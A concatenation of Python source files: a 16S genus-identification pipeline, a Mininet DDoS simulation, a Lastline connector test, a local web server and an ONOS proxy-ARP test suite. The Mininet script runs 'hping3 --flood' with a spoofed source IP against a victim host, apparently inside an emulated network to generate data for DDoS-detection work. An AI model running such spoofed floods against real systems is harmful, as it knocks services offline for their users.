# This full description can be manipulated to extract the genus e.g. Escherichia
genus = dbrecords[subject].description.split('|')[-1].split()[0]
# Increment the number of times this genus was found, or initialise the dictionary with this
# genus the first time it is seen
try:
sample[self.analysistype].frequency[genus] += 1
except KeyError:
sample[self.analysistype].frequency[genus] = 1
try:
recorddict[dbrecords[subject].description] += 1
except KeyError:
recorddict[dbrecords[subject].description] = 1
# Sort the dictionary based on the number of times a genus is seen
sample[self.analysistype].sortedgenera = sorted(sample[self.analysistype].frequency.items(),
key=operator.itemgetter(1), reverse=True)
try:
# Extract the top result, and set it as the genus of the sample
sample[self.analysistype].genus = sample[self.analysistype].sortedgenera[0][0]
# Previous code relies on having the closest refseq genus, so set this as above
# sample.general.closestrefseqgenus = sample[self.analysistype].genus
except IndexError:
# Populate attributes with 'ND'
sample[self.analysistype].sortedgenera = 'ND'
sample[self.analysistype].genus = 'ND'
else:
# Populate attributes with 'ND'
sample[self.analysistype].sortedgenera = 'ND'
sample[self.analysistype].genus = 'ND'
else:
# Populate attributes with 'ND'
sample[self.analysistype].sortedgenera = 'ND'
sample[self.analysistype].genus = 'ND'
def reporter(self):
"""
Creates a report of the results
"""
# Create the path in which the reports are stored
make_path(self.reportpath)
logging.info('Creating {at} report'.format(at=self.analysistype))
# Initialise the header and data strings
header = 'Strain,Gene,PercentIdentity,Genus,FoldCoverage\n'
data = ''
with open(self.sixteens_report, 'w') as report:
with open(os.path.join(self.reportpath, self.analysistype + '_sequences.fa'), 'w') as sequences:
for sample in self.runmetadata.samples:
# Initialise necessary attributes
sample[self.analysistype].sixteens_match = 'ND'
sample[self.analysistype].species = 'ND'
sample[self.analysistype].percent_id = 'ND'
try:
# Select the best hit of all the full-length 16S genes mapped - for 16S use the hit with the
# fewest number of SNPs rather than the highest percent identity
sample[self.analysistype].besthit = sorted(sample[self.analysistype].resultssnp.items(),
key=operator.itemgetter(1))[0][0]
# Parse the baited FASTA file to pull out the the description of the hit
for record in SeqIO.parse(sample[self.analysistype].baitfile, 'fasta'):
# If the best hit e.g. gi|631251361|ref|NR_112558.1| is present in the current record,
# gi|631251361|ref|NR_112558.1| Escherichia coli strain JCM 1649 16S ribosomal RNA ...,
# extract the match and the species
if sample[self.analysistype].besthit in record.id:
# Set the best match and species from the records
sample[self.analysistype].sixteens_match = record.description.split(' 16S')[0]
sample[self.analysistype].species = \
sample[self.analysistype].sixteens_match.split('|')[-1].split()[1]
# Add the sample name to the data string
data += sample.name + ','
# Find the record that matches the best hit, and extract the necessary values to be placed
# in the data string
for name, identity in sample[self.analysistype].results.items():
if name == sample[self.analysistype].besthit:
data += '{gene},{id},{genus},{depth}\n'.format(gene=sample[self.analysistype]
.sixteens_match,
id=identity,
genus=sample[self.analysistype].genus,
depth=sample[self.analysistype]
.avgdepth[name])
# Update the identity attribute
sample[self.analysistype].percent_id = identity
# Create a FASTA-formatted sequence output of the 16S sequence
record = SeqRecord(Seq(sample[self.analysistype].sequences[name]),
id='{sn}_16S'.format(sn=sample.name),
description='')
SeqIO.write(record, sequences, 'fasta')
except (AttributeError, IndexError):
data += '{sn}\n'.format(sn=sample.name)
# Write the results to the report
report.write(header)
report.write(data)
def report_parse(self):
"""
Rather than re-performing analyses, parse the report, and populate metadata objects
"""
test = SixteenSBait(self)
test.targets()
with open(self.sixteens_report, 'r') as report:
for line in report:
try:
strain, sixteens, pid, genus, fold_coverage = line.split(',')
except ValueError:
strain = line.rstrip()
genus = 'NA'
sixteens = str()
pid = '0'
fold_coverage = '0'
for sample in self.runmetadata.samples:
if sample.name == strain:
if not hasattr(sample.general, 'closestrefseqgenus'):
sample.general.closestrefseqgenus = genus
if not hasattr(sample.general, 'referencegenus'):
sample.general.referencegenus = genus
sample[self.analysistype].genus = genus
sample[self.analysistype].avgdepth = dict()
sample[self.analysistype].avgdepth[sixteens] = fold_coverage.rstrip()
sample[self.analysistype].sixteens_match = sixteens
sample[self.analysistype].percent_id = pid
if genus != 'NA':
sample[self.analysistype].results = {sixteens: pid}
else:
sample[self.analysistype].results = dict()
sequences = SeqIO.parse(self.sixteens_sequences, 'fasta')
for record in sequences:
name = record.id.split('_16S')[0]
for sample in self.runmetadata.samples:
if name == sample.name:
sample[self.analysistype].sequences = dict()
for sixteens in sample[self.analysistype].avgdepth:
sample[self.analysistype].sequences[sixteens] = str(record.seq)
for sample in self.runmetadata.samples:
if not hasattr(sample[self.analysistype], 'sequences'):
sample[self.analysistype].sequences = dict()
if not hasattr(sample[self.analysistype], 'sixteens_match') or not sample[self.analysistype].sixteens_match:
sample[self.analysistype].sixteens_match = 'ND'
def __init__(self, args, pipelinecommit, startingtime, scriptpath, analysistype, cutoff, allow_soft_clips=False):
"""
:param args: command line arguments
:param pipelinecommit: pipeline commit or version
:param startingtime: time the script was started
:param scriptpath: home path of the script
:param analysistype: name of the analysis being performed - allows the program to find databases
:param cutoff: percent identity cutoff for matches
:param allow_soft_clips: Boolean whether the BAM parsing should exclude sequences with internal soft clips
"""
# Initialise variables
self.commit = str(pipelinecommit)
self.starttime = startingtime
self.homepath = scriptpath
self.analysistype = analysistype
# Define variables based on supplied arguments
try:
self.path = os.path.join(args.outputpath)
except AttributeError:
self.path = os.path.join(args.path)
assert os.path.isdir(self.path), 'Supplied path is not a valid directory {0!r:s}'.format(self.path)
try:
self.sequencepath = os.path.join(args.sequencepath)
except AttributeError:
self.sequencepath = self.path
assert os.path.isdir(self.sequencepath), 'Sequence path is not a valid directory {0!r:s}' \
.format(self.sequencepath)
try:
self.targetpath = os.path.join(args.referencefilepath, self.analysistype)
except AttributeError:
self.targetpath = os.path.join(args.reffilepath, self.analysistype)
try:
self.reportpath = args.reportpath
except AttributeError:
self.reportpath = os.path.join(self.path, 'reports')
assert os.path.isdir(self.targetpath), 'Target path is not a valid directory {0!r:s}' \
.format(self.targetpath)
try:
self.bcltofastq = args.bcltofastq
except AttributeError:
self.bcltofastq = False
try:
self.miseqpath = args.miseqpath
except AttributeError:
self.miseqpath = str()
try:
self.miseqfolder = args.miseqfolder
except AttributeError:
self.miseqfolder = str()
try:
self.portallog = args.portallog
except AttributeError:
self.portallog = os.path.join(self.path, 'portal.log')
try:
self.fastqdestination = args.fastqdestination
except AttributeError:
self.fastqdestination = str()
self.logfile = args.logfile
try:
self.forwardlength = args.forwardlength
except AttributeError:
self.forwardlength = 'full'
try:
self.reverselength = args.reverselength
except AttributeError:
self.reverselength = 'full'
self.numreads = 2 if self.reverselength != 0 else 1
try:
self.customsamplesheet = args.customsamplesheet
except AttributeError:
self.customsamplesheet = False
# Set the custom cutoff value
self.cutoff = cutoff
# Use the argument for the number of threads to use, or default to the number of cpus in the system
self.cpus = int(args.cpus if args.cpus else multiprocessing.cpu_count())
self.threads = int()
self.runmetadata = args.runmetadata
self.pipeline = args.pipeline
try:
self.copy = args.copy
except AttributeError:
self.copy = False
self.revbait = True
self.allow_soft_clips = allow_soft_clips
self.devnull = open(os.path.devnull, 'w')
self.samplequeue = Queue(maxsize=self.cpus)
self.fastaqueue = Queue(maxsize=self.cpus)
self.blastqueue = Queue(maxsize=self.cpus)
self.baitfile = str()
self.taxonomy = {'Escherichia': 'coli', 'Listeria': 'monocytogenes', 'Salmonella': 'enterica'}
# Fields used for custom outfmt 6 BLAST output:
self.fieldnames = ['query_id', 'subject_id', 'positives', 'mismatches', 'gaps',
'evalue', 'bit_score', 'subject_length', 'alignment_length',
'query_start', 'query_end', 'query_sequence',
'subject_start', 'subject_end', 'subject_sequence']
#
self.sixteens_report = os.path.join(self.reportpath, self.analysistype + '.csv')
self.sixteens_sequences = os.path.join(self.reportpath, self.analysistype + '_sequences.fa')
if not os.path.isfile(self.sixteens_report):
# Run the analyses
self.runner()
else:
self.report_parse()
if __name__ == '__main__':
# Argument parser for user-inputted values, and a nifty help menu
# Get the current commit of the pipeline from git
# Extract the path of the current script from the full path + file name
homepath = os.path.split(os.path.abspath(__file__))[0]
# Find the commit of the script by running a command to change to the directory containing the script and run
# a git command to return the short version of the commit hash
commit = Popen('cd {} && git rev-parse --short HEAD'.format(homepath),
shell=True, stdout=PIPE).communicate()[0].rstrip()
# Parser for arguments
parser = ArgumentParser(description='Perform modelling of parameters for GeneSipping')
parser.add_argument('-o', '--outputpath',
required=True,
help='Path to directory in which report folder is to be created')
parser.add_argument('-s', '--sequencepath',
required=True,
help='Path of .fastq(.gz) files to process.')
parser.add_argument('-r', '--referencefilepath',
help='Provide the location of the folder containing the pipeline accessory files (reference '
'genomes, MLST data, etc.')
parser.add_argument('-n', '--cpus',
help='Number of threads. Default is the number of cores in the system')
parser.add_argument('-b', '--bcltofastq',
action='store_true',
help='Optionally run bcl2fastq on an in-progress Illumina MiSeq run. Must include:'
'miseqpath, and miseqfolder arguments, and optionally readlengthforward, '
'readlengthreverse, and projectName arguments.')
parser.add_argument('-m', '--miseqpath',
help='Path of the folder containing MiSeq run data folder')
parser.add_argument('-f', '--miseqfolder',
help='Name of the folder containing MiSeq run data')
parser.add_argument('-d', '--fastqdestination',
help='Optional folder path to store .fastq files created using the fastqCreation module. '
'Defaults to path/miseqfolder')
parser.add_argument('-r1', '--forwardlength',
default='full',
help='Length of forward reads to use. Can specify "full" to take the full length of '
'forward reads specified on the SampleSheet')
parser.add_argument('-r2', '--reverselength',
default='full',
help='Length of reverse reads to use. Can specify "full" to take the full length of '
'reverse reads specified on the SampleSheet')
parser.add_argument('-c', '--customsamplesheet',
help='Path of folder containing a custom sample sheet (still must be named "SampleSheet.csv")')
parser.add_argument('-P', '--projectName',
help='A name for the analyses. If nothing is provided, then the "Sample_Project" field '
'in the provided sample sheet will be used. Please note that bcl2fastq creates '
'subfolders using the project name, so if multiple names are provided, the results '
'will be split as into multiple projects')
parser.add_argument('-D', '--detailedReports',
action='store_true',
help='Provide detailed reports with percent identity and depth of coverage values '
'rather than just "+" for positive results')
parser.add_argument('-u', '--cutoff',
default=0.8,
help='Custom cutoff values')
parser.add_argument('-C', '--copy',
action='store_true',
help='Normally, the program will create symbolic links of the files into the sequence path, '
'however, the are occasions when it is necessary to copy the files instead')
# Get the arguments into an object
arguments = parser.parse_args()
arguments.pipeline = False
arguments.runmetadata.samples = MetadataObject()
arguments.logfile = os.path.join(arguments.path, 'logfile')
arguments.analysistype = 'sixteens_full'
# Define the start time
start = time.time()
# Run the script
SixteenS(arguments, commit, start, homepath, arguments.analysistype, arguments.cutoff)
# Print a bold, green exit statement
print('\033[92m' + '\033[1m' + "\nElapsed Time: %0.2f seconds" % (time.time() - start) + '\033[0m')
|
tree_topology.py
|
from mininet.net import Mininet
from mininet.topolib import TreeTopo
from mininet.node import Controller, RemoteController,OVSSwitch
import random
import threading
# Create and start mininet topology
tree_topo = TreeTopo(depth=3, fanout=2)
net = Mininet(topo=tree_topo, controller=RemoteController,switch=OVSSwitch)
net.start()
episode_count = 100
episode_length = 10
no_of_hosts = 8
victim_host_ip = '10.0.0.' + str(no_of_hosts)
spoofed_ip = '10.1.1.1'
# Command line tool hping3 is used to simulate DDoS
def ddos_flood(host):
# Attack the last host with IP 10.0.0.4
# timout command is used to abort the hping3 command after the attack was performed for the specifed time
host.cmd('timeout ' + str(episode_length) + 's hping3 --flood ' + ' -a '+ spoofed_ip +' '+ victim_host_ip)
host.cmd('killall hping3')
def ddos_benign(host):
# Send benign packets to victim
host.cmd('timeout ' + str(episode_length) + 's hping3 ' + victim_host_ip)
host.cmd('killall hping3')
# In each episode Randomly select attacker and bengin user
for i in range(episode_count):
print("Episode "+str(i))
attacking_host_id = random.randint(0, no_of_hosts - 2) # select a random host in between 1 and no_of_hosts - 1
attacking_host = net.hosts[attacking_host_id]
benign_host_id = random.choice([i for i in range(0, no_of_hosts - 2) if i not in [attacking_host_id]])
benign_host = net.hosts[benign_host_id]
print("host" + str(attacking_host_id) + " is attacking and host" + str(benign_host_id) + " is sending normal requests")
# Create seperate threads for attacker and benign user
t1 = threading.Thread(target=ddos_benign, args=(benign_host,))
t2 = threading.Thread(target=ddos_flood, args=(attacking_host,))
t1.start()
t2.start()
t1.join()
t2.join()
net.stop()
|
test_connector.py
|
import unittest
from cbint.utils.detonation import DetonationDaemon, CbAPIProducerThread
from cbint.utils.detonation.binary_analysis import DeepAnalysisThread
from cbopensource.connectors.lastline.bridge import LastlineConnector, LastlineProvider
import os
import sys
import tempfile
from time import sleep
import multiprocessing
import socket
import threading
sys.path.append(os.path.dirname(os.path.abspath(__file__)))
from utils.mock_server import get_mocked_server
test_dir = os.path.dirname(os.path.abspath(__file__))
class ServerNeverWokeUpError(Exception):
pass
def sleep_till_available(conn_tuple):
num_retries = 5
while num_retries:
s = socket.socket()
try:
s.connect(conn_tuple)
except socket.error:
num_retries -= 1
sleep(.1)
else:
return
raise ServerNeverWokeUpError(conn_tuple)
class LastlineTest(unittest.TestCase):
def setUp(self):
self.temp_directory = tempfile.mkdtemp()
config_path = os.path.join(test_dir, "data", "daemon.conf")
mydir = os.path.dirname(os.path.abspath(__file__))
binaries_dir = os.path.join(mydir, 'data', 'binary_data')
self.mock_server = get_mocked_server(binaries_dir)
self.mock_server_thread = threading.Thread(target=self.mock_server.run, args=['127.0.0.1', 7982])
self.mock_server_thread.daemon = True
self.mock_server_thread.start()
sleep_till_available(('127.0.0.1', 7982))
self.daemon = LastlineConnector('lastline-test',
configfile=config_path, work_directory=self.temp_directory,
logfile=os.path.join(self.temp_directory, 'test.log'), debug=True)
self.daemon.validate_config()
self.daemon.initialize_queue()
def test_lastline(self):
CbAPIProducerThread(self.daemon.work_queue, self.daemon.cb, self.daemon.name, rate_limiter=0,
stop_when_done=True).run()
dirty_flag = threading.Event()
t = DeepAnalysisThread(self.daemon.work_queue, self.daemon.cb, self.daemon.get_provider(),
dirty_event=dirty_flag)
t.start()
unanalyzed = self.daemon.work_queue.number_unanalyzed()
while unanalyzed:
print unanalyzed
sleep(.1)
unanalyzed = self.daemon.work_queue.number_unanalyzed()
t.stop()
t.join()
|
webui.py
|
import email.utils
import hashlib
from http.client import HTTPConnection
from http.server import BaseHTTPRequestHandler, HTTPServer
import mimetypes
import os
import random
import threading
import time
import webbrowser
def start_server(
server_port=8080,
public_html_path=os.path.realpath(os.path.join(
os.path.dirname(__file__),
'..',
'public_html',
)),
):
"""launch simple http server"""
instance_hash = hashlib.new('SHA256', (
str(time.time()) +
str(random.random()) +
str(random.random())
).encode('utf-8')).hexdigest()
class OLZResultsRequestHandler(BaseHTTPRequestHandler):
def do_GET(self): # noqa: N802
if self.path == '/echo':
self.send_response(200)
self.end_headers()
self.wfile.write(b'echo')
file_path = os.path.join(
public_html_path,
self.path[2 + len(instance_hash):],
)
try:
file_path = file_path[:file_path.rindex('?')]
except:
pass
if os.path.isfile(file_path):
self.send_response(200)
file_type, encoding = mimetypes.guess_type(file_path)
file_date = email.utils.formatdate(os.path.getmtime(file_path))
self.send_header('Content-type', file_type)
self.send_header('Last-modified', file_date)
h = hashlib.sha256()
with open(file_path, 'rb') as fp:
h.update(fp.read())
self.send_header('ETag', h.hexdigest())
self.end_headers()
with open(file_path, 'rb') as fp:
self.wfile.write(fp.read())
else:
self.send_response(404)
self.end_headers()
self.wfile.write(b"HTTP Error 404: Not Found")
def do_HEAD(self): # noqa: N802
if self.path == '/echo':
self.send_response(200)
self.end_headers()
file_path = os.path.join(
public_html_path,
self.path[2 + len(instance_hash):],
)
try:
file_path = file_path[:file_path.rindex('?')]
except:
pass
if os.path.isfile(file_path):
self.send_response(200)
file_type, encoding = mimetypes.guess_type(file_path)
file_date = email.utils.formatdate(os.path.getmtime(file_path))
self.send_header('Content-type', file_type)
self.send_header('Last-modified', file_date)
h = hashlib.sha256()
with open(file_path, 'rb') as fp:
h.update(fp.read())
self.send_header('ETag', h.hexdigest())
self.end_headers()
else:
self.send_response(404)
self.end_headers()
httpd = HTTPServer(("", server_port), OLZResultsRequestHandler)
print("serving at port {0}".format(server_port))
def serve_forever(httpd):
httpd.serve_forever()
httpd.server_thread = threading.Thread(target=serve_forever, args=(httpd,))
httpd.instance_hash = instance_hash
httpd.server_thread.start()
return httpd
def start_webbrowser(
server_port,
instance_hash,
server_path,
):
try:
httpc = HTTPConnection("localhost", server_port, timeout=10)
httpc.request("GET", "/echo")
resp = httpc.getresponse()
resp.read()
httpc.close()
except:
print("Server did not start, aborting...")
return
webbrowser.open(
'http://localhost:' + str(server_port) + '/' +
instance_hash + '/' + server_path,
)
|
proxyarpTest.py
|
# Copyright 2017-present Open Networking Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Copyright 2016-present Ciena Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import unittest
from nose.tools import *
from scapy.all import *
from CordTestUtils import get_mac, log_test
from OnosCtrl import OnosCtrl
from OltConfig import OltConfig
from OnosFlowCtrl import OnosFlowCtrl
from onosclidriver import OnosCliDriver
from CordContainer import Container, Onos, Quagga
from CordTestServer import cord_test_onos_restart, cord_test_quagga_restart
from portmaps import g_subscriber_port_map
import threading
from threading import current_thread
import time
import os
import json
log_test.setLevel('INFO')
class proxyarp_exchange(unittest.TestCase):
apps = ('org.onosproject.vrouter','org.onosproject.proxyarp')
device_id = 'of:' + get_mac()
device_dict = { "devices" : {
"{}".format(device_id) : {
"basic" : {
"driver" : "softrouter"
}
}
},
}
test_path = os.path.dirname(os.path.realpath(__file__))
onos_config_path = os.path.join(test_path, '..', 'setup/onos-config')
GATEWAY = '192.168.10.50'
INGRESS_PORT = 1
EGRESS_PORT = 2
MAX_PORTS = 100
hosts_list = [ ('192.168.10.1', '00:00:00:00:00:01'), ('192.168.11.1', '00:00:00:00:02:01'), ]
@classmethod
def setUpClass(cls):
cls.olt = OltConfig()
cls.port_map, _ = cls.olt.olt_port_map()
if not cls.port_map:
cls.port_map = g_subscriber_port_map
time.sleep(3)
cls.load_device_id()
@classmethod
def tearDownClass(cls):
'''Deactivate the vrouter apps'''
#cls.vrouter_host_unload()
@classmethod
def load_device_id(cls):
did = OnosCtrl.get_device_id()
cls.device_id = did
cls.device_dict = { "devices" : {
"{}".format(did) : {
"basic" : {
"driver" : "softrouter"
}
}
},
}
def cliEnter(self):
retries = 0
while retries < 3:
self.cli = OnosCliDriver(connect = True)
if self.cli.handle:
break
else:
retries += 1
time.sleep(2)
def cliExit(self):
self.cli.disconnect()
@classmethod
def proxyarp_host_unload(cls):
index = 1
for host,_ in cls.hosts_list:
iface = cls.port_map[index]
index += 1
config_cmds = ('ifconfig {} 0'.format(iface), )
for cmd in config_cmds:
log_test.info('host unload command %s' % cmd)
os.system(cmd)
@classmethod
def interface_config_load(cls, interface_cfg = None):
if type(interface_cfg) is tuple:
res = []
for v in interface_cfg:
if type(v) == list:
pass
else:
res += v.items()
config = dict(res)
else:
config = interface_cfg
cfg = json.dumps(config)
with open('{}/network-cfg.json'.format(cls.onos_config_path), 'w') as f:
f.write(cfg)
return cord_test_onos_restart()
@classmethod
def host_config_load(cls, host_config = None):
for host in host_config:
status, code = OnosCtrl.host_config(host)
if status is False:
log_test.info('JSON request returned status %d' %code)
assert_equal(status, True)
@classmethod
def generate_interface_config(cls, hosts = 1):
num = 0
start_host = ( 192 << 24) | ( 168 << 16) | (10 << 8) | 0
end_host = ( 200 << 24 ) | (168 << 16) | (10 << 8) | 0
ports_dict = { 'ports' : {} }
interface_list = []
hosts_list = []
for n in xrange(start_host, end_host, 256):
port_map = ports_dict['ports']
port = num + 1 if num < cls.MAX_PORTS - 1 else cls.MAX_PORTS - 1
device_port_key = '{0}/{1}'.format(cls.device_id, port)
try:
interfaces = port_map[device_port_key]['interfaces']
except:
port_map[device_port_key] = { 'interfaces' : [] }
interfaces = port_map[device_port_key]['interfaces']
ip = n + 1
host_ip = n + 2
ips = '%d.%d.%d.%d/24'%( (ip >> 24) & 0xff, ( (ip >> 16) & 0xff ), ( (ip >> 8 ) & 0xff ), ip & 0xff)
host = '%d.%d.%d.%d' % ( (host_ip >> 24) & 0xff, ( ( host_ip >> 16) & 0xff ), ( (host_ip >> 8 ) & 0xff ), host_ip & 0xff )
mac = RandMAC()._fix()
hosts_list.append((host, mac))
if num < cls.MAX_PORTS - 1:
interface_dict = { 'name' : 'b1-{}'.format(port), 'ips': [ips], 'mac' : mac }
interfaces.append(interface_dict)
interface_list.append(interface_dict['name'])
else:
interfaces[0]['ips'].append(ips)
num += 1
if num == hosts:
break
cls.hosts_list = hosts_list
return (cls.device_dict, ports_dict, hosts_list)
@classmethod
def generate_host_config(cls):
num = 0
hosts_dict = {}
for host, mac in cls.hosts_list:
port = num + 1 if num < cls.MAX_PORTS - 1 else cls.MAX_PORTS - 1
hosts_dict[host] = {'mac':mac, 'vlan':'none', 'ipAddresses':[host], 'location':{ 'elementId' : '{}'.format(cls.device_id), 'port': port}}
num += 1
return hosts_dict.values()
@classmethod
def proxyarp_activate(cls, deactivate = False):
app = 'org.onosproject.proxyarp'
onos_ctrl = OnosCtrl(app)
if deactivate is True:
onos_ctrl.deactivate()
else:
onos_ctrl.activate()
time.sleep(3)
@classmethod
def proxyarp_config(cls, hosts = 1):
proxyarp_configs = cls.generate_interface_config(hosts = hosts)
cls.interface_config_load(interface_cfg = proxyarp_configs)
hostcfg = cls.generate_host_config()
cls.host_config_load(host_config = hostcfg)
return proxyarp_configs
def proxyarp_arpreply_verify(self, ingress, hostip, hostmac, PositiveTest=True):
log_test.info('verifying arp reply for host ip %s host mac %s on interface %s'%(hostip ,hostmac ,self.port_map[ingress]))
self.success = False
def recv_task():
def recv_cb(pkt):
log_test.info('Arp Reply seen with source Mac is %s' %(pkt[ARP].hwsrc))
self.success = True if PositiveTest == True else False
sniff(count=1, timeout=2, lfilter = lambda p: ARP in p and p[ARP].op == 2 and p[ARP].hwsrc == hostmac,
prn = recv_cb, iface = self.port_map[ingress])
t = threading.Thread(target = recv_task)
t.start()
pkt = (Ether(dst = 'ff:ff:ff:ff:ff:ff')/ARP(op=1,pdst=hostip))
log_test.info('sending arp request for dest ip %s on interface %s' %
(hostip, self.port_map[ingress]))
sendp( pkt, count = 10, iface = self.port_map[ingress])
t.join()
if PositiveTest:
assert_equal(self.success, True)
else:
assert_equal(self.success, False)
def __proxyarp_hosts_verify(self, hosts = 1,PositiveTest = True):
_,_,hosts_config = self.proxyarp_config(hosts = hosts)
log_test.info('\nhosts_config %s and its type %s'%(hosts_config,type(hosts_config)))
self.cliEnter()
connected_hosts = json.loads(self.cli.hosts(jsonFormat = True))
log_test.info('Discovered hosts: %s' %connected_hosts)
#We read from cli if we expect less number of routes to avoid cli timeouts
if hosts <= 10000:
assert_equal(len(connected_hosts), hosts)
ingress = hosts+1
for hostip, hostmac in hosts_config:
self.proxyarp_arpreply_verify(ingress,hostip,hostmac,PositiveTest = PositiveTest)
time.sleep(1)
self.cliExit()
return True
def test_proxyarp_with_1_host(self, hosts=1):
res = self.__proxyarp_hosts_verify(hosts = hosts)
assert_equal(res, True)
#cls.proxyarp_host_unload()
def test_proxyarp_with_10_hosts(self, hosts=10):
res = self.__proxyarp_hosts_verify(hosts = hosts)
assert_equal(res, True)
def test_proxyarp_with_50_hosts(self, hosts=50):
res = self.__proxyarp_hosts_verify(hosts = hosts)
assert_equal(res, True)
def test_proxyarp_app_with_disabling_and_re_enabling(self,hosts = 3):
ports_map, egress_map,hosts_config = self.proxyarp_config(hosts = hosts)
ingress = hosts+1
for hostip, hostmac in hosts_config:
self.proxyarp_arpreply_verify(ingress,hostip,hostmac,PositiveTest = True)
time.sleep(1)
log_test.info('Deactivating proxyarp app and expecting not to get arp reply from ONOS')
self.proxyarp_activate(deactivate = True)
for hostip, hostmac in hosts_config:
self.proxyarp_arpreply_verify(ingress,hostip,hostmac,PositiveTest = False)
time.sleep(1)
log_test.info('activating proxyarp app and expecting to get arp reply from ONOS')
self.proxyarp_activate(deactivate = False)
for hostip, hostmac in hosts_config:
self.proxyarp_arpreply_verify(ingress,hostip,hostmac,PositiveTest = True)
time.sleep(1)
def test_proxyarp_nonexisting_host(self,hosts = 1):
_,_,hosts_config = self.proxyarp_config(hosts = hosts)
ingress = hosts + 2
for host, mac in hosts_config:
self.proxyarp_arpreply_verify(ingress,host,mac,PositiveTest = True)
new_host = hosts_config[-1][0].split('.')
new_host[2] = str(int(new_host[2])+1)
new_host = '.'.join(new_host)
new_mac = RandMAC()._fix()
log_test.info('verifying arp reply for host ip %s on interface %s'%(new_host,self.port_map[ingress]))
res=srp1(Ether(dst='ff:ff:ff:ff:ff:ff')/ARP(op=1,pdst=new_host),timeout=2,iface=self.port_map[ingress])
assert_equal(res, None)
log_test.info('arp reply not seen for host ip %s on interface %s as expected'%(new_host,self.port_map[ingress]))
hosts = hosts + 1
_,_,hosts_config = self.proxyarp_config(hosts = hosts)
for host in hosts_config:
if host[0] == new_host:
new_mac = host[1]
self.proxyarp_arpreply_verify(ingress,new_host,new_mac,PositiveTest = True)
def test_proxyarp_removing_host(self,hosts = 3):
ports_map, egress_map,hosts_config = self.proxyarp_config(hosts = hosts)
ingress = hosts+1
for hostip, hostmac in hosts_config:
self.proxyarp_arpreply_verify(ingress,hostip,hostmac,PositiveTest = True)
time.sleep(1)
host_mac = hosts_config[0][1]
log_test.info('removing host entry %s' % host_mac)
self.cliEnter()
hostentries = json.loads(self.cli.hosts(jsonFormat = True))
for host in hostentries:
res = host_mac.upper() in host.values()
if res:
break
assert_equal(res, True)
hostid = host_mac+'/'+'None'
delete_host = self.cli.host_remove(hostid)
hostentries = json.loads(self.cli.hosts(jsonFormat = True))
for host in hostentries:
res = host_mac.upper() in host.values()
if res:
break
assert_equal(res, False)
self.proxyarp_arpreply_verify(ingress,hosts_config[0][0],host_mac,PositiveTest = False)
time.sleep(1)
self.cliExit()
def test_proxyarp_concurrent_requests_with_multiple_host_and_different_interfaces(self,hosts = 10):
ports_map, egress_map,hosts_config = self.proxyarp_config(hosts = hosts)
self.success = True
ingress = hosts+1
ports = range(ingress,ingress+10)
hostmac = []
hostip = []
for ip,mac in hosts_config:
hostmac.append(mac)
hostip.append(ip)
success_dir = {}
def verify_proxyarp(*r):
ingress,hostmac,hostip = r[0],r[1],r[2]
def mac_recv_task():
def recv_cb(pkt):
log_test.info('Arp Reply seen with source Mac is %s' %(pkt[ARP].hwsrc))
success_dir[current_thread().name] = True
sniff(count=1, timeout=5,lfilter = lambda p: ARP in p and p[ARP].op == 2 and p[ARP].hwsrc == hostmac,
prn = recv_cb, iface = self.port_map[ingress])
t = threading.Thread(target = mac_recv_task)
t.start()
pkt = (Ether(dst = 'ff:ff:ff:ff:ff:ff')/ARP(op=1,pdst= hostip))
log_test.info('sending arp request for dest ip %s on interface %s' %
(hostip,self.port_map[ingress]))
sendp(pkt, count = 10,iface = self.port_map[ingress])
t.join()
t = []
for i in range(10):
t.append(threading.Thread(target = verify_proxyarp, args = [ports[i],hostmac[i],hostip[i]]))
for i in range(10):
t[i].start()
for i in range(10):
t[i].join()
if len(success_dir) != 10:
self.success = False
assert_equal(self.success, True)
def test_proxyarp_disabling_enabling_app_initiating_concurrent_requests(self,hosts = 10):
'''Test sending arp requests to multiple host ips at once from different interfaces by disabling and re-enabling proxyarp app'''
ports_map, egress_map,hosts_config = self.proxyarp_config(hosts = hosts)
self.success = True
ingress = hosts+1
ports = range(ingress,ingress+10)
hostmac = []
hostip = []
for ip,mac in hosts_config:
hostmac.append(mac)
hostip.append(ip)
success_dir = {}
def verify_proxyarp(*r):
ingress,hostmac,hostip = r[0],r[1],r[2]
def mac_recv_task():
def recv_cb(pkt):
log_test.info('Arp Reply seen with source Mac is %s' %(pkt[ARP].hwsrc))
success_dir[current_thread().name] = True
sniff(count=1, timeout=5,lfilter = lambda p: ARP in p and p[ARP].op == 2 and p[ARP].hwsrc == hostmac,
prn = recv_cb, iface = self.port_map[ingress])
t = threading.Thread(target = mac_recv_task)
t.start()
pkt = (Ether(dst = 'ff:ff:ff:ff:ff:ff')/ARP(op=1,pdst= hostip))
log_test.info('sending arp request for dest ip %s on interface %s' %
(hostip,self.port_map[ingress]))
sendp(pkt, count = 10,iface = self.port_map[ingress])
t.join()
t1 = []
#starting multi threading before proxyarp disable
for i in range(10):
t1.append(threading.Thread(target = verify_proxyarp, args = [ports[i],hostmac[i],hostip[i]]))
for i in range(10):
t1[i].start()
for i in range(10):
t1[i].join()
if len(success_dir) != 10:
self.success = False
assert_equal(self.success, True)
self.proxyarp_activate(deactivate = True)
#starting multi threading after proxyarp disable
t2 = []
self.success = False
for i in range(10):
t2.append(threading.Thread(target = verify_proxyarp, args = [ports[i],hostmac[i],hostip[i]]))
for i in range(10):
t2[i].start()
for i in range(10):
t2[i].join()
if len(success_dir) != 10:
self.success = True
assert_equal(self.success, False)
self.proxyarp_activate(deactivate = False)
#starting multi threading after proxyarp re-enable
self.success = True
t3 = []
for i in range(10):
t3.append(threading.Thread(target = verify_proxyarp, args = [ports[i],hostmac[i],hostip[i]]))
for i in range(10):
t3[i].start()
for i in range(10):
t3[i].join()
if len(success_dir) != 20:
self.success = False
assert_equal(self.success, True)
def test_proxyarp_with_existing_and_non_existing_hostIPs_initiating_concurrent_requests(self,hosts = 5):
